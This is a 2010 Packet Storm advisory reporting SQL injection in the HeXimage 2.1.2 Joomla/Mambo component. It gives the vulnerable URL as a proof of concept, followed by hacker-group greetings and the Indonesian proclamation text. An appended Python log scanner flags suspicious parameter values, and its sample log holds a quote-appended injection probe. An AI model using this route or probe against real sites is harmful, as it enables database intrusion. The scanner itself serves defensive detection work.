packetstorm | Don Tukulesto | PACKETSTORM:92855
History: Aug 17, 2010 - 12:00 a.m.

Mambo / Joomla HeXimage 2.1.2 SQL Injection

packetstormsecurity.com
`[o]========================================================[o]  
  
[!] Mambo & Joomla! Component HeXimage SQL Injection Vulnerability  
[!] Author : Don Tukulesto ([email protected])  
[!] Homepage : http://indonesiancoder.com  
[!] Date : Tue, August 17, 2010  
  
[o]========================================================[o]  
  
[ Software Information ]  
  
[>] Vendor : http://www.joomlafrance.org  
[>] Download : http://www.joomlafrance.org/telecharger/startdown/HeXimage.html  
[>] Version : 2.1.2  
[>] License : GNU General Public License  
[>] Type : Non-Commercial ( open source CMS )  
[>] Method : SQL Injection  
  
========================================================  
  
[ Proof of Concept ]  
  
http://[site]/index.php?option=com_heximage&task=selector&albumselected=INDONESIANCODER&pID=31337  
  
========================================================  
  
[ We are ]  
  
[>] Indonesian Coder Team - AntiSecurity - ServerIsDown - SurabayaHackerLink  
[>] M364TR0N | DEESSAINT | Cyb3r_tr0n | Gonzhack | kaMtiEz | El N4ck0 | ibl13Z | arianom  
[>] elv1n4 | YaDoY666 | ./Jack- | xshadow | M3NW5 | Pathloader | Mboys | Contrex | amxku  
[>] xnitro @xtremenitro.org | DraCoola | Senot | ran | CherCut & bocah|duduL | Ghambass | CS-31  
[>] James Brown & Todd @packetstormsecurity.org | Maksymilian & sp3x @securityreason.com  
  
[ Notes ]  
  
[>] Proclamation of Indonesian Independence  
  
PROCLAMATION  
  
WE THE PEOPLE OF INDONESIA HEREBY DECLARE THE INDEPENDENCE OF INDONESIA.  
MATTERS WHICH CONCERN THE TRANSFER OF POWER AND OTHER THINGS WILL BE EXECUTED  
BY CAREFUL MEANS AND IN THE SHORTEST POSSIBLE TIME.  
  
DJAKARTA, AUGUST 17, 1945  
  
IN THE NAME OF THE PEOPLE OF INDONESIA  
SOEKARNO - HATTA  
`
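
A log check for the route shown in the proof-of-concept URL, added here as an example and not part of the advisory. The advisory does not say which parameter is injectable, so the check watches both `albumselected` and `pID`; the set of benign characters and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters that appear in the advisory's proof-of-concept URL.
WATCHED = ("albumselected", "pID")
# Assumption: legitimate values use only letters, digits, '_' and '-'.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]*")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Aug/2010:10:00:00 +0000] "GET /index.php?option=com_heximage'
    '&task=selector&albumselected=holiday&pID=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Aug/2010:10:00:05 +0000] "GET /index.php?option=com_heximage'
    '&task=selector&albumselected=holiday&pID=31337%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [17/Aug/2010:10:00:09 +0000] "GET /index.php?option=com_content'
    '&view=article&id=5 HTTP/1.1" 200 8841',
]

def suspicious_params(url):
    """Return (name, decoded value) pairs for watched parameters of a
    com_heximage selector request that fall outside the benign set."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_heximage" not in query.get("option", []):
        return []
    if "selector" not in query.get("task", []):
        return []
    return [(name, value)
            for name in WATCHED
            for value in query.get(name, [])
            if not SAFE_VALUE.fullmatch(value)]

def scan(log_lines):
    """Return (line number, hits) for every log line worth reviewing."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((lineno, hits))
    return findings

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: review {hits}")
```

Values are compared after one round of URL decoding, so double-encoded input shows up as a hit containing `%` rather than being decoded further.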